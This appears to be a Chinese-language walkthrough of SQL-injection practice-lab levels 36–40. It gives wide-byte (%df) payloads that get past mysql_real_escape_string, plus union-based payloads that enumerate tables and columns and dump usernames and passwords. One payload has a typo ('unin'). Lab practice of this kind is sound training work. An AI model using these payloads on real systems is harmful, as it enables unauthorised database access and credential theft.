第36关(宽字节注入(Bypass MySQL Real Escape String))
查数据库
?id=-1%df%27%20union%20select%202,database(),3%20--+
查表
?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
查列
?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+
查数据
?id=-1%df' union select 1,group_concat(username,password),3 from users --+
第37关(post宽字节注入(MySQL_real_escape_string) )
我们这关要用到抓包工具进行抓包,因为这关是post注入嘛
登录的时候进行抓包
查库
%df' union select 1,database() --+
查表
%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() --+
查列
%df' union select 1,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273
查数据
%df' union select 1,group_concat(username,password)from users--+
第38关(联合查询/也可堆叠注入)
查库
?id=-1' union select 1,database(),3 --+
查表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
查列
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema= database() and table_name=0x7573657273 --+
查数据
?id=-1' union select 1,group_concat(username,password),3 from users --+
第39关(联合查询)
查数据库
?id=-1 unin select 1,database(),3 --+
查表
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
查列
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273
查数据
?id=-1 union select 1,group_concat(username,password),3 from users --+
第40关( ') 闭合)
查数据库
?id=-1') union select 1,database(),3 --+
查表
?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
查列
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+
查数据
?id=-1') union select 1,group_concat(username,password),3 from users --+